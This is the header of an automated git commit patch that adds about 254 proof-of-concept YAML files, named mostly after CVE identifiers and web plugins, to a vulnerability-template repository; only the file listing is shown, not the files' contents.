From 55abde876789af718649175626c045ca5777efaa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 6 Dec 2024 12:43:36 +0000 Subject: [PATCH] 20241206 --- date.txt | 2 +- poc.txt | 252 ++++++++++++++++++ ...itle-ebc5f77da2159725c00bfadc6477c6db.yaml | 59 ++++ ...elay-d1709b11e04e7ac0020e84fff5516e5a.yaml | 59 ++++ ...cred-b69b74183494c4b8dbaaa94b47c77a89.yaml | 59 ++++ ...ogin-59e25716cd4187f6ae0041590ffc4112.yaml | 59 ++++ ...aser-a95c341c56a938945d517c311512eb15.yaml | 59 ++++ poc/cve/CVE-2011-4926-2089.yaml | 35 +++ poc/cve/CVE-2011-5181-2118.yaml | 25 ++ poc/cve/CVE-2016-1000135-2681.yaml | 39 +++ poc/cve/CVE-2018-16283-3362.yaml | 31 +++ poc/cve/CVE-2018-3810-3557.yaml | 43 +++ poc/cve/CVE-2020-8771-5339.yaml | 55 ++++ poc/cve/CVE-2021-24226-5648.yaml | 33 +++ poc/cve/CVE-2021-24274-5660.yaml | 37 +++ poc/cve/CVE-2021-24298-5686.yaml | 35 +++ poc/cve/CVE-2021-24316-5695.yaml | 34 +++ poc/cve/CVE-2021-24510-5759.yaml | 48 ++++ poc/cve/CVE-2021-24838-5769.yaml | 32 +++ poc/cve/CVE-2022-1609(1).yaml | 51 ++++ ...2416-b6e308449e56a72318f3547f11c5f544.yaml | 59 ++++ ...0680-0ba13fa9274659992e0f27178c53ade5.yaml | 59 ++++ poc/cve/CVE-2024-10056.yaml | 59 ++++ poc/cve/CVE-2024-10178.yaml | 59 ++++ ...0247-7e9248f7d08a8c804a85ce87492c023b.yaml | 59 ++++ ...0320-f49b48a1fa24c03d49f1d0779bc05074.yaml | 59 ++++ ...0516-90da3b799283fae5783fef07a67bdeef.yaml | 59 ++++ ...0578-6bc0121b7a6d48f214b8939cb1f78d29.yaml | 59 ++++ ...0681-074ccd2e143d120107ec916d21cfe73a.yaml | 59 ++++ ...0689-ec644bcff6b8252f58e7ce0b4795467c.yaml | 59 ++++ ...0692-c75c741c420e4c515c59f2646be4e222.yaml | 59 ++++ poc/cve/CVE-2024-10777.yaml | 59 ++++ ...0836-e5372e893ae8325e3b297cc93a19837f.yaml | 59 ++++ poc/cve/CVE-2024-10848.yaml | 59 ++++ ...0849-c4f62162d556d3b337dc88f33abf0608.yaml | 59 ++++ ...0874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml | 59 ++++ ...0879-fdafc38df20050c33f2864a1f7138f44.yaml | 59 ++++ poc/cve/CVE-2024-10881.yaml | 59 ++++ ...0909-308c66fb506ba01c372d73eaeb9b223a.yaml | 59 ++++ poc/cve/CVE-2024-10937.yaml | 59 ++++ ...0961-60fb90d65f9868b90bab1ea437eb89b3.yaml | 59 ++++ ...1178-1d03d4b0d9125cf395a9b36a817c53db.yaml | 59 ++++ ...1201-aa3d65db710ab72aee8e6c78d61fbc19.yaml | 59 ++++ ...1204-f87aa22c9bcd426fec72b8003f96482e.yaml | 59 ++++ ...1276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml | 59 ++++ ...1289-4184d5eaa04495a4f6cb218a2896f8eb.yaml | 59 ++++ ...1292-850b0e5aa453cf8d597f2fe778aca46b.yaml | 59 ++++ ...1323-93b3a3a19c4e461d1bd3833545daae0f.yaml | 59 ++++ poc/cve/CVE-2024-11324.yaml | 59 ++++ ...1336-3e061f8446314ee414179038a3da58ff.yaml | 59 ++++ ...1339-5fa325846534729a9ee06c7b2d86ccc1.yaml | 60 +++++ poc/cve/CVE-2024-11341.yaml | 59 ++++ ...1352-2956a03392350547f722d5c5b1052818.yaml | 59 ++++ ...1368-4f78bcb719a028575fa2e8dc0ead82a6.yaml | 59 ++++ ...1379-039fa25f860d0b73f90d1c2ba7698bfc.yaml | 59 ++++ poc/cve/CVE-2024-11420.yaml | 59 ++++ poc/cve/CVE-2024-11429.yaml | 59 ++++ ...1444-4063529e850dc8cdb770b409a5b563ef.yaml | 59 ++++ ...1450-aa0eea523b63076daf425f6ddb400979.yaml | 59 ++++ ...1460-54390097dc3ed52a0207a2b2c6c9909f.yaml | 59 ++++ ...1585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml | 59 ++++ ...1687-ce28bfd71dd54c3c29603bf27368d6c6.yaml | 59 ++++ ...1728-2c0f50aa3db592d906a698b62cca69c7.yaml | 59 ++++ ...1729-fc3745f8e039decbc81308be45aacd79.yaml | 59 ++++ ...1730-2e1143d8e0f261dcfb3953128e8fb707.yaml | 59 ++++ poc/cve/CVE-2024-11779.yaml | 59 ++++ ...1823-96487c8862c6208dac1f43cc4dba71e2.yaml | 59 ++++ ...2003-f77c04413b23540455a2432d7e006cc4.yaml | 59 ++++ ...2027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml | 59 ++++ ...2028-743f7fbc736d510f8f41d855806fd00b.yaml | 59 ++++ ...2060-bd4215568402b7df5ccbbeef7231911e.yaml | 59 ++++ ...2110-a525586ff802b7e30487eba9d47bf8aa.yaml | 59 ++++ ...2155-7dae1ca184aa2d7a98e91ae763450832.yaml | 59 ++++ ...9626-ad9b3818c747f1ed3832fbdce623db21.yaml | 59 ++++ ...4271-7e84de8005b7402b3460842595eb6a21.yaml | 59 ++++ ...4633-a45a113bbd0240e2736131a0f29a199f.yaml | 59 ++++ ...9232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml | 59 ++++ ...9665-0c7cde70a3364f6417c8986330b177f2.yaml | 59 ++++ ...2436-793469b5c4fe6748676f0c6f113984fc.yaml | 59 ++++ ...3740-3512f8e780249684a6674da83d240a21.yaml | 59 ++++ ...3741-3c0e15ff482eacb374486d199d05d15e.yaml | 59 ++++ ...3742-0f8484e9711afc6f54dffab08b8fb64d.yaml | 59 ++++ ...3743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml | 59 ++++ ...3744-19861d99577b3be5146b27b69f05c3f4.yaml | 59 ++++ ...3745-5b88f5f8304e8fddbc476a349ec52bdb.yaml | 59 ++++ ...3746-3ded91890966ff471c6e9354d423b5ef.yaml | 59 ++++ ...3747-4e94b0bd06bf43aff2239514311d93c8.yaml | 59 ++++ ...3748-7d8e48f7ecab5232b81666c88e70115b.yaml | 59 ++++ ...3749-1d9d87f4022b97c2e4089a6828e241fc.yaml | 59 ++++ ...3750-631ac7e2fd3894f3f08f81c51233807e.yaml | 59 ++++ ...3751-eec858ad68cecec914c1fdcabd2501d5.yaml | 59 ++++ ...3752-4e8cd08f77b9779e9257358737a94eef.yaml | 59 ++++ ...3753-358e653d0dd73eb56688321aaef32145.yaml | 59 ++++ ...3754-493566f1c1a1308e200b9e93498256c2.yaml | 59 ++++ ...3755-504d4dcc3efe862c171e1626b904f4e4.yaml | 59 ++++ ...3756-9cd6fd513857f8e7aa7f612ae1f35644.yaml | 59 ++++ ...3757-9e5a50025a96a90d40bab8055add551b.yaml | 59 ++++ ...3758-ebe442ae0c94160a0452474317b40359.yaml | 59 ++++ ...3759-dbad57d1fe7a81773ada836f186bcbb3.yaml | 59 ++++ ...3760-491bf87c29a91b27218dea79d03b2338.yaml | 59 ++++ ...3761-ccd75e569a6f5c92a6b627a161efff1a.yaml | 59 ++++ ...3762-f6f324446de244136f8f61b504284d66.yaml | 59 ++++ ...3763-1664f5785c3962b04d39cbb880af99a4.yaml | 59 ++++ ...3764-d38ed8a49a12e2b84a3819c47c303668.yaml | 59 ++++ ...3765-1c8351ea02e8d70b52879086ddd276a2.yaml | 59 ++++ ...3766-2940cf0523c9b377de42a03a2c813390.yaml | 59 ++++ ...3767-774ba4d9c8507f0511f1d4fe58cfb435.yaml | 59 ++++ ...3768-9a3deed242a94103b910250e4c9f9cc6.yaml | 59 ++++ ...3769-15f79e5b8994448885f3d02862f03b54.yaml | 59 ++++ ...3770-dde24fdaf6fdccf92776b21600160051.yaml | 59 ++++ ...3771-3e40a710fce8ae1cf756cfd3c23e5785.yaml | 59 ++++ ...3772-277c760c8d8f4930fc51c04bff87c407.yaml | 59 ++++ ...3773-c70474e6b49675474684415b8bad7136.yaml | 59 ++++ ...3774-eb9fe05556006515a14f186abd44c385.yaml | 59 ++++ ...3775-27ea91b6010aa9c51cff5259b54c7600.yaml | 59 ++++ ...3776-be68d5e8752ad62ee640890ae13d0500.yaml | 59 ++++ ...3777-4cd0625e0e16873871e20b7b67514246.yaml | 59 ++++ ...3778-f21730b86a71afb64088be9a871cf272.yaml | 59 ++++ ...3779-cdef31c739309ab66ad6f17f25de736a.yaml | 59 ++++ ...3780-c8b9d80262e337c12d17be598ed0d8eb.yaml | 59 ++++ ...3781-82f815daf3b97e22b7a9510fbb6996a6.yaml | 59 ++++ ...3782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml | 59 ++++ ...3783-77d64d8587b2b8b84b9dc1128c836d51.yaml | 59 ++++ ...3784-633230e1ee0fbfce83da62ed739c6684.yaml | 59 ++++ ...3785-fbeea1c61d1a3517baa1e80e34734207.yaml | 59 ++++ ...3786-e41d57d430f469f2f89c135637eddbf0.yaml | 59 ++++ ...3787-959f3b3e171585d69ebf8ef3fe99b91a.yaml | 59 ++++ ...3788-02a231d247e905fcbe4ce7bc32a3afa3.yaml | 59 ++++ ...3789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml | 59 ++++ ...3790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml | 59 ++++ ...3791-baff954ee6f7d9891e0773323ee016bc.yaml | 59 ++++ ...3792-79e219d8701a1b03429312ab9d2266e2.yaml | 59 ++++ ...3793-d3005914f049e11801fdde85b91a6bf6.yaml | 59 ++++ ...8485-fa09b925d5408de5c1804d1d70100e86.yaml | 59 ++++ ...9270-54f88c5ac9605569d0f73ca27f9f2362.yaml | 59 ++++ ...9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml | 59 ++++ ...9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml | 59 ++++ ...9769-04f41ad5af8b4a40298696fa6f430b08.yaml | 59 ++++ ...9866-7390d9a349370910408c5562d135bc89.yaml | 59 ++++ ...9872-0a2b107a70a05e6330557fd04ebc29f7.yaml | 59 ++++ ...oter-2f2d13d68d1aa9ea670e89d2619faa2d.yaml | 59 ++++ ...-lms-ba6446ba5ad9a5f47c413928535e804a.yaml | 59 ++++ ...orms-889210e907a32f3bac90ac14ce08d937.yaml | 59 ++++ poc/open_redirect/eelv-redirection.yaml | 59 ++++ ...next-f83be05ea88f2f446101c8a2b115a53a.yaml | 59 ++++ ...quiz-31f0fc808945baa02a83ad64def460f0.yaml | 59 ++++ ...eway-348f645a41831338e3ad29ac7c3259b9.yaml | 59 ++++ ...ship-f395947e480c6bd2b9668c739bc544ea.yaml | 59 ++++ poc/other/azure-storage-sas-leak.yaml | 71 +++++ ...line-9dd1526748a52141c3bb31208d05fbb4.yaml | 59 ++++ ...lter-c1a17d8e31627d5c93bdc282adcf65c6.yaml | 59 ++++ ...ront-8afd882eedd0c6f2566c03372054a9da.yaml | 59 ++++ ...tons-ecfd254ef292ce73504cf2aba9045a31.yaml | 59 ++++ ...dons-b5f3c81a63289463e2ed249c024ac15f.yaml | 59 ++++ ...tore-4d44e2fa98e9402abb36eca1074de857.yaml | 59 ++++ ...trwa-731e3e5e4597e7faa251c93c238e74cd.yaml | 59 ++++ ...cter-91350bdff3ee5a46d0032f5a28a6265e.yaml | 59 ++++ ...ntor-9a3e30634b4dc7fbfd732639244dc3ab.yaml | 59 ++++ ...e-me-574b61de3d2f5e0e6650c80193c07c44.yaml | 59 ++++ ...umbs-2267a02f90f738f304f189dd1027700a.yaml | 59 ++++ ...nner-e282372c4562ecaf77b223ee7da1e18e.yaml | 59 ++++ ...stem-32675851747f22022fefedfa5bef2428.yaml | 59 ++++ ...plus-3ed7fab53de695a4fcfb576680a10315.yaml | 59 ++++ ...xita-69e3979808a27506066d883a9f8eb4e6.yaml | 59 ++++ ...lery-1e6185b69c7ba994a4d3f38a05160b82.yaml | 59 ++++ ...ends-808e945853b70d97c7af6eefcb7afa6c.yaml | 59 ++++ ...deos-3ff175744c927034ff36b2d07fcbc5d1.yaml | 59 ++++ ...deos-f2aafb7e611c06dc54124ab527015f64.yaml | 59 ++++ ...ntor-7eaebe2336e04d77baf7d72493304929.yaml | 59 ++++ ...stem-36736e541fef2ef4d937383b3514fc1b.yaml | 59 ++++ ...stem-652da11115c2f950c640dcb31343ea31.yaml | 59 ++++ ...stem-e972e5fa7dc7eb147901d9e27c2ac74c.yaml | 59 ++++ ...core-4972ccccaaba94b2ac118dc56066bfe6.yaml | 59 ++++ ...core-c40309757059a7c5f5e2a082116ad730.yaml | 59 ++++ ...osts-f94901beaffb62ce5c913ef672f4eb96.yaml | 59 ++++ ...cker-303b0f9000254327c2e69e892380ecb9.yaml | 59 ++++ ...cita-7c52a014cce8f41b194342f08ceede41.yaml | 59 ++++ ...read-2941ea333622216e1c6091029b0b178a.yaml | 59 ++++ ...mash-6377f947dc4cbd6377b900e7b2a109af.yaml | 59 ++++ poc/other/newsmunch.yaml | 59 ++++ ...fice-b402953c76f82d1b88842a9ee0c31f2f.yaml | 59 ++++ ...tore-9887b9e8aa29c789cc721ef3d676a573.yaml | 59 ++++ ...aphy-b8d402b7f8267a8fbeabdc06350287fa.yaml | 59 ++++ ...ugin-951ffa4455cde2cf84338c23f5961c7d.yaml | 59 ++++ ...ntor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml | 59 ++++ ...ntor-a7a3589609ae92e0dc1bd8b339906582.yaml | 59 ++++ ...news-5b335bb90b570f570873fbfa38b47c5b.yaml | 59 ++++ ...nner-0b21c7eea2233a52fab8c4a62c453192.yaml | 59 ++++ ...free-addabdad3f0edc1afcad78dcfe322e09.yaml | 59 ++++ ...ugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml | 59 ++++ ...free-d19ba041fbf80d78fb62d140a19bbe1d.yaml | 59 ++++ ...lery-b1da3f38e609312a5083d34cf5925003.yaml | 59 ++++ ...ster-30df007059118a37ebbef148c110f5c7.yaml | 59 ++++ ...ntor-ecddfed759e913087d218b9e237f2c06.yaml | 59 ++++ ...edad-29fa607193cd3b39b09ca02b2ce4f403.yaml | 59 ++++ ...-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml | 59 ++++ ...ctor-a408956eb25c0fc5ebb6237dc9efaaab.yaml | 59 ++++ ...nion-9407692ccefc1b1607863a7068a9481a.yaml | 59 ++++ ...lite-9d1b83ae9017d2fadd1702f8770861b6.yaml | 59 ++++ ...enty-008f64526c3780ff8f14b386a2edcab8.yaml | 59 ++++ ...grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml | 59 ++++ ...soon-1b1151732f9e837b52353dea3817cd15.yaml | 59 ++++ ...soon-be5df66158fd08241f78579ea8d369cd.yaml | 59 ++++ ...watu-690d8bcd0e263bad7d88f01f7c626e23.yaml | 59 ++++ poc/other/wip-woocarousel-lite.yaml | 59 ++++ ...lder-b3d98dd124afa7dc460f57d96fd05347.yaml | 59 ++++ ...-tab-40f41253ca6b22bb907999b982dcace4.yaml | 59 ++++ ...ayer-6d6ac328025439c4bf1dd52ca758d69c.yaml | 59 ++++ ...capl-f64257e15582ca43c7ad0a549fe64fd8.yaml | 59 ++++ .../accounting-for-woocommerce.yaml | 59 ++++ ...erce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml | 59 ++++ ...tion-2e2806962d8874bbd69c8d26bf481248.yaml | 59 ++++ ...oods-66898c5242c9d33ba57cb7fe04ac3a35.yaml | 59 ++++ ...card-f2d90f9b034e1f97969a83011a928867.yaml | 59 ++++ ...arch-67ee26ea0af5450a37293a361423bdd3.yaml | 59 ++++ ...0874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml | 59 ++++ ...1178-1d03d4b0d9125cf395a9b36a817c53db.yaml | 59 ++++ ...1201-aa3d65db710ab72aee8e6c78d61fbc19.yaml | 59 ++++ ...1444-4063529e850dc8cdb770b409a5b563ef.yaml | 59 ++++ ...1450-aa0eea523b63076daf425f6ddb400979.yaml | 59 ++++ ...1728-2c0f50aa3db592d906a698b62cca69c7.yaml | 59 ++++ ...1823-96487c8862c6208dac1f43cc4dba71e2.yaml | 59 ++++ ...9626-ad9b3818c747f1ed3832fbdce623db21.yaml | 59 ++++ ...3745-5b88f5f8304e8fddbc476a349ec52bdb.yaml | 59 ++++ ...3759-dbad57d1fe7a81773ada836f186bcbb3.yaml | 59 ++++ ...3786-e41d57d430f469f2f89c135637eddbf0.yaml | 59 ++++ ...3790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml | 59 ++++ ...ntor-bd743f52479cb010ad232ebee7dbf30b.yaml | 59 ++++ ...tion-26be16d9007bef8defcdb810970efcf9.yaml | 59 ++++ ...itle-ebc5f77da2159725c00bfadc6477c6db.yaml | 59 ++++ ...tter-50f846e0f4847e28db594b1f3b22c537.yaml | 59 ++++ ...rter-e79372032f3cd9964820840ddb7f0ea3.yaml | 59 ++++ ...ntor-e125cc11edbf54c4514f0c2218a86a07.yaml | 59 ++++ ...gine-5eb904d4a3173fdb3278f6a25598e63f.yaml | 59 ++++ ...cred-b69b74183494c4b8dbaaa94b47c77a89.yaml | 59 ++++ ...adge-824e800865ecf93bf8922dba7aad4e65.yaml | 59 ++++ ...nder-2bb28c0dbe7d31806c826438ecefef2f.yaml | 59 ++++ ...ugin-5dcfaa6624128695b8dbff266dad887f.yaml | 59 ++++ ...nect-e19e41c4fd554c823dba2f39d46b632a.yaml | 59 ++++ ...ider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml | 59 ++++ ...webp-db74fce5b7adcf6651896f57aad35a67.yaml | 59 ++++ ...webp-db74fce5b7adcf6651896f57aad35a67.yaml | 59 ++++ ...umwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml | 59 ++++ ...umwp-b74a371b4e61bc84d659569310ff3232.yaml | 59 ++++ ...r-wp-9730906988033bfae8062aec3f96a7aa.yaml | 59 ++++ ...cast-82473e0c5aa4cc508b6700e7d6fff64e.yaml | 59 ++++ ...kery-9c2d47674bd034385887846ea596ce8b.yaml | 59 ++++ ...rest-52e62929115acbdac3eec0fd5a13d231.yaml | 59 ++++ ...ncer-94f0ee6838b2f0b8be9cc18455fff889.yaml | 59 ++++ ...plus-178bdd1913c816f82e7f19af89ce62f9.yaml | 59 ++++ ...webp-db74fce5b7adcf6651896f57aad35a67.yaml | 59 ++++ ...maid-384c0a7cc618fb29d85738396ef5ac01.yaml | 59 ++++ ...plus-77641909bd19731b0b84338bb1bae5f0.yaml | 59 ++++ ...stem-06fc769dd5f956e0682bf74af252b00f.yaml | 59 ++++ 254 files changed, 14865 insertions(+), 1 deletion(-) create mode 100644 poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml create mode 100644 poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml create mode 100644 poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml create mode 100644 poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml create mode 100644 poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml create mode 100644 poc/cve/CVE-2011-4926-2089.yaml create mode 100644 poc/cve/CVE-2011-5181-2118.yaml create mode 100644 poc/cve/CVE-2016-1000135-2681.yaml create mode 100644 poc/cve/CVE-2018-16283-3362.yaml create mode 100644 poc/cve/CVE-2018-3810-3557.yaml create mode 100644 poc/cve/CVE-2020-8771-5339.yaml create mode 100644 poc/cve/CVE-2021-24226-5648.yaml create mode 100644 poc/cve/CVE-2021-24274-5660.yaml create mode 100644 poc/cve/CVE-2021-24298-5686.yaml create mode 100644 poc/cve/CVE-2021-24316-5695.yaml create mode 100644 poc/cve/CVE-2021-24510-5759.yaml create mode 100644 poc/cve/CVE-2021-24838-5769.yaml create mode 100644 poc/cve/CVE-2022-1609(1).yaml create mode 100644 poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml create mode 100644 poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml create mode 100644 poc/cve/CVE-2024-10056.yaml create mode 100644 poc/cve/CVE-2024-10178.yaml create mode 100644 poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml create mode 100644 poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml create mode 100644 poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml create mode 100644 poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml create mode 100644 poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml create mode 100644 poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml create mode 100644 poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml create mode 100644 poc/cve/CVE-2024-10777.yaml create mode 100644 poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml create mode 100644 poc/cve/CVE-2024-10848.yaml create mode 100644 poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml create mode 100644 poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml create mode 100644 poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml create mode 100644 poc/cve/CVE-2024-10881.yaml create mode 100644 poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml create mode 100644 poc/cve/CVE-2024-10937.yaml create mode 100644 poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml create mode 100644 poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml create mode 100644 poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml create mode 100644 poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml create mode 100644 poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml create mode 100644 poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml create mode 100644 poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml create mode 100644 poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml create mode 100644 poc/cve/CVE-2024-11324.yaml create mode 100644 poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml create mode 100644 poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml create mode 100644 poc/cve/CVE-2024-11341.yaml create mode 100644 poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml create mode 100644 poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml create mode 100644 poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml create mode 100644 poc/cve/CVE-2024-11420.yaml create mode 100644 poc/cve/CVE-2024-11429.yaml create mode 100644 poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml create mode 100644 poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml create mode 100644 poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml create mode 100644 poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml create mode 100644 poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml create mode 100644 poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml create mode 100644 poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml create mode 100644 poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml create mode 100644 poc/cve/CVE-2024-11779.yaml create mode 100644 poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml create mode 100644 poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml create mode 100644 poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml create mode 100644 poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml create mode 100644 poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml create mode 100644 poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml create mode 100644 poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml create mode 100644 poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml create mode 100644 poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml create mode 100644 poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml create mode 100644 poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml create mode 100644 poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml create mode 100644 poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml create mode 100644 poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml create mode 100644 poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml create mode 100644 poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml create mode 100644 poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml create mode 100644 poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml create mode 100644 poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml create mode 100644 poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml create mode 100644 poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml create mode 100644 poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml create mode 100644 poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml create mode 100644 poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml create mode 100644 poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml create mode 100644 poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml create mode 100644 poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml create mode 100644 poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml create mode 100644 poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml create mode 100644 poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml create mode 100644 poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml create mode 100644 poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml create mode 100644 poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml create mode 100644 poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml create mode 100644 poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml create mode 100644 poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml create mode 100644 poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml create mode 100644 poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml create mode 100644 poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml create mode 100644 poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml create mode 100644 poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml create mode 100644 poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml create mode 100644 poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml create mode 100644 poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml create mode 100644 poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml create mode 100644 poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml create mode 100644 poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml create mode 100644 poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml create mode 100644 poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml create mode 100644 poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml create mode 100644 poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml create mode 100644 poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml create mode 100644 poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml create mode 100644 poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml create mode 100644 poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml create mode 100644 poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml create mode 100644 poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml create mode 100644 poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml create mode 100644 poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml create mode 100644 poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml create mode 100644 poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml create mode 100644 poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml create mode 100644 